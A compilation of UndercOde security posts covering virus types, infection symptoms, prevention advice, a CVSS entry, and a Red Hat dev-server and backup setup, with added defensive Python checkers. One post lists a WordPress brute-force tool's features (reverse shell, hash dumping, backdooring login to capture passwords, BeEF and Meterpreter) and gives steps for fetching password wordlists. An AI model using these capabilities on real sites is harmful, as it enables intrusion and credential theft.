--- UndercOde ---
Virus / malware types
twitter.com/UndercOdetc
1) File viruses. These attach their own code to executable files (EXE, COM, BAT, ...). A typical representative is "Black Friday".
2) Boot-sector viruses. These write their code into the boot sector, the master boot record or the partition table of a hard disk, so they run before the operating system does. Typical representatives are the Stoned ("Marijuana") virus and Disk Killer.
3) Multipartite viruses. A hybrid of the first two: they infect both executables and boot sectors, and spread quickly over networks through infected executables.
4) Macro viruses. Windows 95 was released in August 1995 and quickly became the mainstream operating system. The DOS-era viruses gradually died out because they did not work on the new system. Two new kinds replaced them: viruses that still attack executable files, such as the notorious CIH, and macro viruses, which infect the macros defined by widely used office software (such as Word) and therefore spread quickly through shared documents. Melissa is the best-known representative.
5) Network viruses (worms). These spread through web sites and e-mail. They can hide in downloaded programs and active web content (Java applets, ActiveX controls) or arrive as e-mail attachments; once the user runs the program, the malicious activity starts immediately. Because the Internet lets them spread so fast, this type is the most harmful. Activity has been rampant recently; the destructive "love" virus (ILOVEYOU, a VBScript e-mail worm) belongs to this category.
Written by UndercOde
--- UndercOde ---
π¦ Virus-malwares types
twitter.com/UndercOdetc
1) File viruses. Such viruses attach their own code to executable files (EXE, COM, BAT ...). A typical representative is " Black Friday ".
2) Guided virus . This type of virus inserts virus instructions into the boot sector , master boot record, or partition table of a hard disk . Typical representatives are cannabis virus , disk killer, etc.
3) Mixed viruses . Is a hybrid of the first two viruses, and quickly spread online through executable files .
4) Macro virus. In August 1995, Windows 95 was released, and it quickly became the mainstream operating system . Various viruses that had been under the DOS system for a while, gradually lost their vitality because they did not adapt to the new system. One new type of virus that has replaced it is one that also attacks executable files , such as the notorious CIH virus, and the other is macro viruses, which mainly infect macros defined by word processing software (such as Word) that is widely used daily . And thus spread rapidly. Melissa is the "outstanding" representative in this regard.
5) Network viruses . Network viruses spread through websites and emails . They are hidden in Java and ActiveX programs. If a user downloads a program with the virus, they immediately begin to disrupt activities. Due to the rapid spread of the Internet, this type of virus is even more harmful. Recently, activities have been rampant, and the destructive "love" virus belongs to this category.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
--- UndercOde ---
How to tell a machine is infected
1) Security tools refuse to run, or are killed right after starting.
2) Online anti-virus web pages and files cannot be opened (vendor sites are blocked, often through hosts-file or DNS tampering).
3) Crashes with "insufficient memory" messages.
4) Task Manager will not open or shows unknown processes; startup items are abnormal.
5) The hard disk and network card activity lights flash wildly while the machine is idle.
6) Abnormal logins to QQ, MSN or online-game accounts (stolen credentials).
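Symptom 2 above usually comes from a tampered hosts file: malware pins anti-virus and update domains to 127.0.0.1 or 0.0.0.0 so the victim cannot download tools or signatures. The following is an added example, not code from the original post: it parses hosts-file text and flags every entry that maps a watched security/update domain to an address where the real service cannot live. The watched-domain list and the sample hosts content are constructed for this example; extend the list for your own environment.

```python
"""Added example (not from the original post): flag hosts-file entries that
redirect security-vendor or update domains, one common reason why "online
anti-virus pages cannot be opened" on an infected Windows box.

Assumptions (not stated on the page): the watched-domain list below and the
sample hosts-file content are constructed for this example.
"""
import ipaddress

# Domains that malware commonly blackholes so the victim cannot reach AV or
# update servers. Constructed watch-list; extend it for your own environment.
WATCHED_DOMAINS = (
    "windowsupdate.com",
    "update.microsoft.com",
    "kaspersky.com",
    "symantec.com",
    "mcafee.com",
    "avast.com",
    "virustotal.com",
)

def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping in a hosts file."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            yield ip, name.lower(), line_no

def is_watched(hostname):
    """True when hostname is a watched domain or a subdomain of one."""
    return any(hostname == d or hostname.endswith("." + d) for d in WATCHED_DOMAINS)

def suspicious_hosts_entries(text):
    """Return a list of (line_no, hostname, ip, reason) for entries that pin a
    watched domain to an address where the real service cannot live."""
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if not is_watched(name):
            continue
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((line_no, name, ip, "unparseable address"))
            continue
        if addr.is_loopback or addr.is_unspecified:
            reason = "blackholed to loopback/unspecified"
        elif addr.is_private:
            reason = "redirected to a private address"
        else:
            reason = "pinned to a fixed public address (bypasses DNS)"
        findings.append((line_no, name, str(addr), reason))
    return findings

# Constructed sample: a legitimate localhost line, two blackholed AV/update
# domains and one redirect to a LAN host that is not the real service.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
# comment line
127.0.0.1       www.kaspersky.com kaspersky.com
0.0.0.0         windowsupdate.com
192.168.1.50    www.virustotal.com
"""

if __name__ == "__main__":
    for line_no, name, ip, reason in suspicious_hosts_entries(SAMPLE_HOSTS):
        print(f"line {line_no}: {name} -> {ip} ({reason})")
```

On a real machine feed it the contents of C:\Windows\System32\drivers\etc\hosts (or /etc/hosts); an empty result only rules out this one blocking technique, since the same effect can be produced through DNS settings, a proxy or a packet filter.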
Written by UndercOde
--- UndercOde ---
Malware control :
> Because viruses cause serious damage to computer resources, effective measures must be taken on both the management and the technical side to keep them out.
T.me/UndercOdeTesting
LET'S START :
In daily work, the main measures against infection are:
1) First and most important: choose and install anti-virus software. New viruses keep appearing (on average about 13 a day), and in today's highly shared, highly networked environment a computer without anti-virus software will not stay clean for long. Scan the machines you use regularly, including removable media and hard disks, so that infections are detected early and stopped before they spread.
2) Limit write access on the server. Keep write permission on shared server directories in as few hands as possible; that alone avoids a lot of trouble and loss.
3) Be wary of removable media of unknown origin (floppies, USB sticks, pirated CDs/DVDs). Think before you plug one in. If you have to, scan it first with anti-virus software, and scan every file on it, not only executables but also archives. Likewise, when you lend media to someone else, write-protect it beforehand (floppies and many USB sticks have a switch; finalised optical discs are read-only by nature) so that viruses on the other machine cannot be written back onto it.
4) Scan e-mail before reading it. Some mail clients open attachments automatically when a message is opened; turn that feature off.
5) Be careful when downloading. Downloaded files are one of the main sources of viruses.
Save files in RTF or plain-text (ASCII) format. If you want to share data with others over the network server and do not want to think about viruses, save the file as RTF or plain text: neither format carries Word/Excel macros, so macro viruses cannot ride along. Check that a file really is what its extension says, though: a binary .doc that has merely been renamed to .rtf is still a .doc, and Word opens it as one, macros included.
6) Partition the hard disk sensibly and keep a way to recover. The advice given here: format C: as FAT32 with a capacity above 20 GB; if C: is then damaged by a virus, KV300 can recover more than 98% of the data, while with a FAT16 C: drive smaller than 20 GB only about 5% can be recovered.
Use Ghost (disk cloning) to back up the hard disk so that the system can be restored quickly, or use the Windows system-restore settings.
7) Update anti-virus software promptly to keep its defences current.
8) Important data and files must be backed up, offline or to the cloud.
9) Check the firewall: make sure it is enabled and that its rule set only allows what is needed.
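The macro viruses described in the malware-types post above and the RTF/plain-text advice in item 5 both come down to one question: can this file carry a VBA project? The following is an added example, not code from the original post: it classifies a file by its leading bytes rather than its extension (RTF, legacy OLE container, OOXML with or without a vbaProject.bin, plain text) and reports which files are potential macro carriers. The sample files are constructed in memory, including one macro document renamed to .rtf to show why the bytes, not the name, are checked.

```python
"""Added example (not from the original post): a quick check for the macro
carriers the page warns about. It classifies a file as plain text / RTF /
OOXML without macros / OOXML with a VBA project / legacy OLE (binary .doc,
.xls) by looking at the bytes, not the extension, and reports which ones
can carry macros. Sample files are constructed in memory for this example.
"""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary Office container
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML (.docx/.docm/...) is a zip
RTF_MAGIC = b"{\\rtf"

def classify_office_file(data):
    """Return (kind, can_carry_macros) for the given file bytes."""
    if data.startswith(RTF_MAGIC):
        return "rtf", False                   # RTF has no VBA storage
    if data.startswith(OLE_MAGIC):
        # Binary .doc/.xls/.ppt: the VBA project lives inside the OLE
        # container; treat every OLE file as a potential macro carrier.
        return "ole", True
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = zf.namelist()
        except zipfile.BadZipFile:
            return "corrupt-zip", True        # cannot prove it is clean
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            return "ooxml-macro", True        # .docm/.xlsm, or a renamed one
        if "[Content_Types].xml" in names:
            return "ooxml", False
        return "zip", False
    try:
        data.decode("ascii")
        return "text", False
    except UnicodeDecodeError:
        return "unknown", False

def build_ooxml(with_macro):
    """Construct a minimal docx/docm-shaped zip for demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00fake vba stream\x00")
    return buf.getvalue()

# Constructed samples keyed by the name the user *sees*; the extension is
# deliberately misleading for the last one, to show why bytes are checked.
SAMPLES = {
    "notes.txt": b"plain ascii notes\n",
    "report.rtf": b"{\\rtf1\\ansi Hello}",
    "clean.docx": build_ooxml(with_macro=False),
    "invoice.docm": build_ooxml(with_macro=True),
    "old.doc": OLE_MAGIC + b"\x00" * 64,
    "renamed.rtf": build_ooxml(with_macro=True),   # macro file renamed to .rtf
}

def macro_carriers(samples):
    """Names of files that could carry macros, regardless of extension."""
    return [name for name, data in samples.items()
            if classify_office_file(data)[1]]

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:14s} {classify_office_file(data)}")
```

The check is deliberately conservative: every legacy OLE file counts as a possible carrier because telling a macro-free .doc from one with a VBA stream requires parsing the OLE directory, which is what a full scanner (or a library such as oletools) does.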
Written by UndercOde
--- UndercOde ---
CVSS Scores & Vulnerability Types (Windows Server 2019 example entry) :
> The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities. CVSS attempts to assign severity scores to vulnerabilities, allowing responders to prioritize responses and resources according to threat.
LET'S START :
The following is a CVSS v2 record for one Windows Server 2019 vulnerability, in the form vulnerability databases list it (the entry does not name the CVE):
CVSS Score 2.1
Confidentiality Impact Partial (There is considerable informational disclosure.)
Integrity Impact None (There is no impact to the integrity of the system.)
Availability Impact None (There is no impact to the availability of the system.)
Access Complexity Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit.)
Authentication Not required (Authentication is not required to exploit the vulnerability.)
Gained Access None
Vulnerability Type(s) Bypass a restriction or similar
CWE ID 20 (Improper Input Validation)
Note: the listing omits the Access Vector. With the metrics above, a v2 base score of 2.1 is only produced by Access Vector = Local, i.e. the vector AV:L/AC:L/Au:N/C:P/I:N/A:N; the same impacts reachable over the network (AV:N) would score 5.0.
Purpose :
1) CVSS provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity.
2) The numerical score can then be translated into a qualitative rating (low, medium, high and, from CVSS v3 on, critical) to help organizations assess and prioritize their vulnerability management processes.
3) CVSS is a published standard used by organizations worldwide, and the CVSS SIG (the FIRST special interest group that maintains it) continues to improve it.
@UndercOdeTesting
--- UndercOde ---
WordPress brute force : latest tool
t.me/UndercOdeTesting
Features of the tool (as its author lists them):
1) Brute force via the API rather than the login form, bypassing some forms of protection
2) Can automatically upload an interactive shell
3) Can be used to spawn a full-featured reverse shell
4) Dumps WordPress password hashes
5) Can backdoor the authentication function for plaintext password collection
6) Inject a BeEF hook into all pages
7) Pivot to Meterpreter if needed
LET'S START :
The steps below set up wordlistctl (BlackArch's wordlist fetcher) to obtain the password lists a brute-force run needs.
1) sudo apt install python3-pip python3-libtorrent python3-coloredlogs
2) git clone https://github.com/BlackArch/wordlistctl
3) cd wordlistctl
4) Open the requirements.txt file
> gedit requirements.txt
and remove this line from it:
libtorrent
(the libtorrent Python binding comes from the apt package installed in step 1, so pip does not need to fetch it)
5) Then continue:
> sudo pip3 install -r requirements.txt
> python3 ./wordlistctl.py
In BlackArch this program is in the standard repository; install it directly:
> sudo pacman -S wordlistctl
Search the wordlist index by keyword, for example Russian-language lists:
wordlistctl -S rus
--==[ wordlistctl by blackarch.org ]==--
[*] searching for rus in urls.json
[+] wordlist russian_users found: id=842
[+] wordlist rus_surnames_date099_fin found: id=1022
[+] wordlist rus_surnames_first_letter found: id=1046
[+] wordlist rus_surnames_fin found: id=1094
[+] wordlist rus_surnames_date19002020_fin found: id=1104
[+] wordlist rus_names_date099_fin found: id=1163
[+] wordlist rus_names_translit found: id=1185
[+] wordlist rus_cities_translit found: id=1206
[+] wordlist rus_names_date19002020_fin found: id=1209
[+] wordlist rus_eng found: id=1245
[+] wordlist rus_names_fin found: id=1278
[+] wordlist rus_mat found: id=1316
[+] wordlist rus_latin found: id=1323
[+] wordlist rus_names_kb_chage found: id=1324
6) mkdir wordlists
> Download the wordlist with identifier 1714 (-f 1714) into this folder (-d wordlists), decompress it and delete the original archive (-Xr):
> wordlistctl -f 1714 -d wordlists -Xr
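Feature 1 ("brute force via the API, not the login form") is worth understanding from the defender's side. The post does not say which API; in common WordPress tooling it is xmlrpc.php, where a single system.multicall request can carry many wp.getUsersBlogs calls, each with its own username and password, so login-form rate limits never see the attempts. The following is an added example, not the tool's code and not from the original post: it parses an XML-RPC request body and counts the credential guesses it contains, so a WAF rule or log pipeline can alert on amplified requests. The request bodies are constructed inline; the alert threshold and the map of login-bearing methods are assumptions.

```python
"""Added example (not from the original post, and not the tool's code):
count the credential guesses carried by one WordPress XML-RPC request,
expanding system.multicall, so that multicall-based brute force can be
detected even though the login form is never touched. The request bodies
below are constructed for this example; the threshold and the method map
are assumptions.
"""
import xml.etree.ElementTree as ET

LOGIN_METHODS = {                # method -> index of the username parameter
    "wp.getUsersBlogs": 0,       # (username, password)
    "wp.getUsers": 1,            # (blog_id, username, password)
    "wp.getProfile": 1,
    "wp.getPosts": 1,
    "blogger.getUsersBlogs": 1,  # (appkey, username, password)
}

def _scalar(value_el):
    """Text of a <value><string>x</string></value> (or a bare <value>x</value>)."""
    if value_el is None:
        return ""
    child = next(iter(value_el), None)
    return (child.text if child is not None else value_el.text) or ""

def _username(values, method):
    idx = LOGIN_METHODS[method]
    return _scalar(values[idx]) if len(values) > idx else ""

def credential_attempts(body):
    """Return (method_name, username) for every login-bearing call in an
    XML-RPC request, expanding system.multicall into its member calls."""
    root = ET.fromstring(body)
    method = root.findtext("methodName", "").strip()
    params = root.find("params")
    attempts = []
    if method == "system.multicall" and params is not None:
        array = params.find("param/value/array/data")
        calls = array.findall("value/struct") if array is not None else []
        for call in calls:
            members = {m.findtext("name"): m.find("value") for m in call.findall("member")}
            name = _scalar(members.get("methodName"))
            inner = members.get("params")
            if name in LOGIN_METHODS and inner is not None:
                attempts.append((name, _username(inner.findall("array/data/value"), name)))
    elif method in LOGIN_METHODS and params is not None:
        values = [p.find("value") for p in params.findall("param")]
        attempts.append((method, _username(values, method)))
    return attempts

def is_amplified_login(body, threshold=3):
    """True when one request carries at least `threshold` credential guesses."""
    return len(credential_attempts(body)) >= threshold

def _multicall_body(guesses):
    """Construct a system.multicall body with one wp.getUsersBlogs per guess."""
    calls = "".join(
        "<value><struct>"
        "<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>"
        "<member><name>params</name><value><array><data>"
        f"<value><string>{u}</string></value><value><string>{p}</string></value>"
        "</data></array></value></member>"
        "</struct></value>"
        for u, p in guesses)
    return ("<methodCall><methodName>system.multicall</methodName>"
            f"<params><param><value><array><data>{calls}</data></array></value></param></params>"
            "</methodCall>")

# Constructed samples: a normal single call and a three-guess multicall.
SINGLE_CALL = ("<methodCall><methodName>wp.getUsersBlogs</methodName>"
               "<params><param><value><string>admin</string></value></param>"
               "<param><value><string>correct-horse</string></value></param></params></methodCall>")
MULTICALL = _multicall_body([("admin", "123456"), ("admin", "password"), ("editor", "letmein")])

if __name__ == "__main__":
    for label, body in (("single", SINGLE_CALL), ("multicall", MULTICALL)):
        print(label, credential_attempts(body), "amplified:", is_amplified_login(body))
```

In practice the simplest mitigation is to disable xmlrpc.php entirely if nothing (Jetpack, mobile apps) needs it, or to block system.multicall at the web server; the counter above is for the case where the endpoint must stay open and you want to see the amplification in your logs.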
@UndercOdeTesting
--- UndercOde ---
Apache-Team development environment setup: dhcp + apache + ftp + cvs + samba :
Let's introduce the terms first:
instagram.com/UndercOdeTestingCompany
LET'S START :
> Most of these services exist because most development clients still run Windows. Each service gets a simple, basic configuration demonstration. They include:
1) IP management (DHCP): address management for the servers (combined with the Samba WINS service for name resolution) and for developers' client machines; web service (Apache): document sharing, the CVS web interface, forum tools, etc.;
2) FTP service: file download and sharing;
version control (CVS): version control for program source code and documentation;
> file sharing (Samba): NetBIOS-based file sharing so that Windows clients can reach it easily (for example to install tools); database server (MySQL): back-end database for some of the applications; backup mechanism (wget + rsync): backups.
3) Many settings are left at their defaults. Note that some environment settings differ between bash and tcsh, so they are not constant across shells.
Server plan as follows:
Primary server (Main)         Backup server (Backup)
+----------------------+      +----------------------+
| Apache web server    |      | File backup          |
| Samba share          |      |                      |
| DHCP server          |      | DHCP backup          |
| CVS server           |      | MySQL server         |
| GNATS server         |      |                      |
| Phorum server        |      |                      |
| Database backup      |      |                      |
+----------------------+      +----------------------+
4) Hardware preparation: at least 2 servers.
In theory any system crash is only a matter of time, and no one can guarantee that a developer will never make a mistake. The only solution is: backup, backup, backup ...
Operating system preparation
5) FreeBSD or GNU/Linux. The configuration in this article takes Red Hat as the example. Note: when installing, select the "Development Tools" category; many of the tools below must be compiled with GCC, and some application scripts use Perl. The two servers use the IP addresses 192.168.0.200 and 192.168.0.201 respectively.
Written by Underc0de
--- UndercOde ---
Let's configure our servers :
<> dhcp + apache + ftp + cvs + samba :
twitter.com/UndercOdeTC/
LET'S START :
1) Services installed on both machines: SSH, FTP, DHCP.
SSH: basic login service. For internal development the defaults are generally acceptable, but it is recommended to
2) change PermitRootLogin yes in /etc/ssh/sshd_config to PermitRootLogin no (log in as a normal user and use su/sudo; where possible also move to key-based logins and set PasswordAuthentication no).
3) FTP: on FreeBSD in particular it is recommended to use ProFTPD instead of the system ftpd: http://www.proftpd.org/ (if the site is down, try later). Keep in mind that FTP sends credentials and data in clear text, so expose it only on the internal LAN.
Install:
tar zxf proftpd-version.tar.gz
cd proftpd-version/
./configure
make
make install
4) Default configuration, /usr/local/etc/proftpd.conf:
ServerName "ProFTPD"
ServerType standalone
DefaultServer on
AllowOverwrite on
Port 21
Umask 022
# Do not reverse-resolve the host name of the connecting machine
UseReverseDNS off
MaxInstances 30
User nobody
Group nogroup
5) DHCP service: to manage developers' and servers' IP addresses on the same LAN more easily, it is best to place the servers in a fixed static range (for example 192.168.0.200 and above) and hand out dynamic addresses to developers' client machines from the range 192.168.0.10-200. Assume our main server (192.168.0.200) and the auxiliary development server (192.168.0.201) use static IPs and provide dynamic allocation for 192.168.0.10-200 on the segment. The DHCP service is installed on both servers.
6) One is the primary DHCP service, which serves about 70% of the subnet's IP pool; the other is the backup and holds the remaining 30%. In the example, .200 is responsible for .10-.100 and .201 for .110-.150. If dhcpd is not installed by default, take the DHCP package from the installation media or download the source from http://www.isc.org and compile it (the install location and configuration file path may differ).
7) Default configuration on the primary server (dhcpd.conf):
ddns-update-style none;
default-lease-time 120000;
max-lease-time 920000;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option netbios-name-servers 192.168.0.200;
option routers 192.168.0.1;
option domain-name-servers 202.106.196.115, 202.96.199.133;
option domain-name "example.com";
subnet 192.168.0.0 netmask 255.255.255.0 {
  range 192.168.0.10 192.168.0.100;
}
8) Notes:
Default lease per IP: default-lease-time 120000; (the unit is seconds, so this is about 33 hours; a 2-day lease would be 172800)
Longest lease: max-lease-time 920000; (about 10.6 days)
Default subnet mask: option subnet-mask 255.255.255.0;
Default broadcast address: option broadcast-address 192.168.0.255;
9) Enable the Samba service on 192.168.0.200 with WINS support, for internal name resolution: option netbios-name-servers 192.168.0.200;
Written by Underc0de
--- UndercOde ---
Default configuration that should be on the server
pinterest.com/UndercOdeOfficial
LET'S START :
1) Default gateway: option routers 192.168.0.1;
2) Default DNS servers: option domain-name-servers 202.106.196.115, 202.96.199.133;
3) Default domain name: option domain-name "example.com";
4) Default subnet setting:
subnet 192.168.0.0 netmask 255.255.255.0 {
  # dynamically allocate .10-.100 on this subnet
  range 192.168.0.10 192.168.0.100;
}
5) The only difference on the secondary DHCP server is that its subnet dynamically assigns .110-.150; the pools of the primary and the secondary DHCP server must not overlap:
subnet 192.168.0.0 netmask 255.255.255.0 {
  range 192.168.0.110 192.168.0.150;
}
Application installation on the main server:
Samba service: used for file sharing and internal WINS resolution.
Here is just a simple configuration for a read-only share (smb.conf):
[global]
# Others will see this Linux machine in the WORKGROUP group under
# "My Network Places", with the comment "My Samba Server"
workgroup = WORKGROUP
netbios name = linux
server string = My Samba Server
# log settings
log file = /var/log/samba/%m.log
max log size = 50
# security settings
security = share
# use Samba's WINS service, and /etc/hosts for internal name resolution
wins support = yes
name resolve order = hosts lmhosts wins bcast
dns proxy = yes
[public]
# a shared directory
comment = Public Stuff
path = /home/share
public = yes
guest ok = yes
read only = yes
writable = no
printable = no
Note: security = share was removed in Samba 4.0; on current versions use security = user together with map to guest = Bad User to get the same anonymous read-only share.
4) To let everyone reach the main server (192.168.0.200) as dev.example.com internally, DHCP advertises the main server as the internal WINS server (the netbios-name-servers option above), WINS support is enabled in the Samba service on .200, and the WINS server is told to fall back to DNS (dns proxy = yes) for names it does not know. That lookup goes through the system resolver, which reads /etc/hosts, so the hosts file becomes the WINS name table. Set it as follows in /etc/hosts:
192.168.0.200 dev.example.com bbs.example.com dev bbs
192.168.0.201 bak.example.com backup
After this, intranet clients that obtained their IP through DHCP can reach the development server directly as dev.example.com.
5) I used short prefixes for all machine names (dev, bbs, bak, etc.) for a reason: Samba's nmbd really resolves NetBIOS names, and those are limited to 16 characters (effectively 15, since the 16th byte is the name-type suffix). So although 192.168.0.202 username.example.com is a valid DNS entry, username.example.com is longer than 15 characters and cannot be found through Samba WINS resolution. A name such as dev.chedong.com is treated as one flat machine name, "dev.chedong.com". When I used Samba's WINS resolution, the client could never ping test.chedong.com (16 characters), and that problem bothered me for a while.
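Two of the rules in this post are easy to break silently: the primary and secondary DHCP pools must not overlap (and the static servers must sit outside both), and every name that WINS is expected to resolve from /etc/hosts must fit in a 15-character NetBIOS name. The following is an added example, not from the original post: it parses the dhcpd.conf range statements and the hosts table from this post and reports violations. The configuration text is the page's; the check functions and their names are mine. Note that dev.example.com and bbs.example.com are exactly 15 characters, which is why they resolve while username.example.com does not.

```python
"""Added example (not from the original post): sanity checks for the
dev-environment configuration described above.
 (1) The dynamic ranges of the primary and secondary DHCP servers must not
     overlap, and the static server addresses must lie outside both.
 (2) Every name Samba's WINS is expected to resolve from /etc/hosts must fit
     in a NetBIOS name (15 characters), otherwise clients cannot resolve it.
The config text is taken from the page; the check functions are mine.
"""
import ipaddress
import re

PRIMARY_DHCPD = """\
subnet 192.168.0.0 netmask 255.255.255.0 {
  range 192.168.0.10 192.168.0.100;
}
"""
SECONDARY_DHCPD = """\
subnet 192.168.0.0 netmask 255.255.255.0 {
  range 192.168.0.110 192.168.0.150;
}
"""
STATIC_SERVERS = ("192.168.0.200", "192.168.0.201")

HOSTS = """\
192.168.0.200 dev.example.com bbs.example.com dev bbs
192.168.0.201 bak.example.com backup
192.168.0.202 username.example.com
"""

RANGE_RE = re.compile(r"^\s*range\s+(\S+)\s+(\S+)\s*;", re.M)

def dhcp_ranges(conf):
    """Return [(first, last)] as ip_address objects for every range statement."""
    return [(ipaddress.ip_address(a), ipaddress.ip_address(b))
            for a, b in RANGE_RE.findall(conf)]

def ranges_overlap(r1, r2):
    """Inclusive interval overlap test."""
    return r1[0] <= r2[1] and r2[0] <= r1[1]

def check_dhcp_pools(primary_conf, secondary_conf, static_ips):
    """Return a list of human-readable problems; empty means the split is sane."""
    problems = []
    prim, sec = dhcp_ranges(primary_conf), dhcp_ranges(secondary_conf)
    for a in prim:
        for b in sec:
            if ranges_overlap(a, b):
                problems.append(f"pool overlap: {a[0]}-{a[1]} vs {b[0]}-{b[1]}")
    for ip in static_ips:
        addr = ipaddress.ip_address(ip)
        for lo, hi in prim + sec:
            if lo <= addr <= hi:
                problems.append(f"static server {ip} inside dynamic pool {lo}-{hi}")
    return problems

NETBIOS_MAX = 15   # 16-byte NetBIOS name; the last byte is the name-type suffix

def check_netbios_names(hosts_text):
    """Return hosts-file names too long to be resolved as NetBIOS names."""
    too_long = []
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments, then split
        for name in fields[1:]:                  # fields[0] is the address
            if len(name) > NETBIOS_MAX:
                too_long.append(name)
    return too_long

if __name__ == "__main__":
    print("dhcp:", check_dhcp_pools(PRIMARY_DHCPD, SECONDARY_DHCPD, STATIC_SERVERS) or "ok")
    print("names too long for WINS:", check_netbios_names(HOSTS))
```

Run it after every edit to either dhcpd.conf; an overlapping pool shows up as two machines with the same address and intermittent outages, which is much harder to diagnose after the fact than before.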
Written by Underc0de
--- UndercOde ---
π¦ WEB service: APACHE-lastest config-usage... :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Apache is mainly used for WEB file sharing and as the front end for some applications (CVSWEB, GNATSWEB, PHPMYADMIN, etc.). Apache 1.3 is still used here, because many applications, such as PHP, are not yet complete on 2.0.
Installation: download the latest version from http://httpd.apache.org
2) Compile options: the following lets all modules be loaded dynamically through the configuration file, which makes it convenient to add and remove application modules later:
./configure --prefix=/home/apache --enable-shared=max --enable-module=most
More installation instructions: see the APACHE installation notes.
π¦ Document sharing tips:
1) For sharing documents the autoindex module is very useful: it lets APACHE index a directory automatically. By default entries are sorted by file/directory name and file names longer than 40 characters are truncated. To display complete file names and, like Explorer, list directories first and files after them:
2) in the module settings:
# NameWidth=*: the file name column adapts to the longest name in the current directory
# FoldersFirst: list directories before files (similar to Explorer)
# ScanHTMLTitles: use the TITLE of HTML files as their description
# DescriptionWidth=*: the description column adapts to the longest description
IndexOptions FancyIndexing NameWidth=* FoldersFirst ScanHTMLTitles DescriptionWidth=*
3) For CGI development, to let users publish CGI programs from their own directory, e.g. http://192.168.0.200/~chedong/cgi-bin/my_cgi, add a regular expression mapping in the module settings:
ScriptAliasMatch ^/~([a-z]+)/cgi-bin/(.*) /home/$1/cgi-bin/$2
This means a request for ~user_name/cgi-bin/cgi_name is mapped automatically to /home/user_name/cgi-bin/cgi_name.
Version control: CVS
CVS is installed by default on almost all servers; it only needs to be initialized with the following steps.
In /etc/profile on the machine where the master CVS repository resides:
export CVSROOT=/home/cvsroot
4) On the other development servers set:
export CVSROOT=:ext:$USER@192.168.0.200:/home/cvsroot
export CVS_RSH=ssh
Then run cvs init on the main server.
5) For the CVSWEB settings, see the CVSWEB part of the CVS common command manual below.
Downloading CVSWEB: CVSWEB has evolved from the original version into versions with much richer interfaces. This one is convenient to install and set up: http://www.spaghetti-code.de/software/linux/cvsweb/
6) Download and unpack:
tar zxf cvsweb.tgz
7) You can also customize the description text in the header of the conf file by changing $long_intro to the text you need. The first thing to put into the CVS repository should be the installation documentation for the system above. For more extended uses of CVS, see the CVSTRAC section of the CVS common command manual.
Resource sharing between multiple services can generally be handled through symbolic links. For example, to publish the anonymous FTP content (say the /var/ftp/pub directory) over the WEB:
ln -s /var/ftp/pub /home/apache/htdocs/pub
To let the documents in /usr/share/doc be browsed over the WEB:
ln -s /usr/share/doc /home/apache/htdocs/doc
To let the content published over the WEB also be reached through Windows Network Neighborhood (assuming /home/share is the read-only share path published by samba):
ln -s /home/apache/htdocs /home/share
Starting services automatically:
Services already installed on the system can generally be configured to start automatically through the setup service configuration tool; otherwise add startup commands to /etc/rc.local.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ example for writing the following script in the ROOT CRON of the main server
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
#time sync
0 5 * * 1 (/usr/bin/rdate -s YOUR_DATE_TIME_SERVER)
#backup gnats
6 3 * * * (cd /home; tar cf /home/backup/gnats.`date +\%w`.tar gnats)
#backup cvsroot
5 3 * * * (cd /home; tar cf /home/backup/cvsroot.`date +\%w`.tar cvsroot)
#backup apache
8 3 * * * (cd /home; tar cf /home/backup/apache.`date +\%w`.tar apache)
#gzip all backup
50 3 * * * (gzip -f /home/backup/*.tar)
#webalizer demo
3 5 * * * (/usr/local/bin/webalizer -c /home/apache/conf/webalizer.conf /home/apache/logs/`date -d yesterday +\%w`/access_log)
#remove last week log
3 4 * * * (find /home/apache/logs/ -name access_log -mtime +6 -exec rm -f {} \;)
In this way the /home/backup directory holds 7 rotating backups, one per weekday. Then, with a CRON entry on the secondary server, mirror the primary's /home/backup directory with the -m option of wget, or synchronize it with rsync. The last two entries concern the server's log statistics with webalizer, and the APACHE logs are rotated through cronolog; please refer to their specific settings.
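The weekday rotation from the crontab above, as an added example (not the original post's script) written as a shell file so that each cron line only calls one function and no '%' escaping is needed; the /home layout is replaced by constructed temporary directories.

```shell
#!/bin/sh
# Added example, not from the original post: the weekday-rotated backup jobs
# above as one script, so each crontab line just calls a function here and the
# '%' characters never need escaping in the crontab. Assumed layout (hypothetical):
# $SRC_ROOT holds the directories to archive, $BACKUP_DIR receives the tarballs.

BACKUP_DIR="${BACKUP_DIR:-/home/backup}"
SRC_ROOT="${SRC_ROOT:-/home}"

# Archive path for a directory in a given weekday slot (0-6): gnats -> gnats.3.tar
rotated_name() {   # $1: directory name, $2: weekday number
    printf '%s/%s.%s.tar' "$BACKUP_DIR" "$1" "$2"
}

# Archive one directory into today's slot, replacing last week's copy of that
# weekday, then compress it. Prints the resulting .gz path.
backup_dir() {     # $1: directory name under $SRC_ROOT
    target=$(rotated_name "$1" "$(date +%w)")
    ( cd "$SRC_ROOT" && tar cf "$target" "$1" ) || return 1
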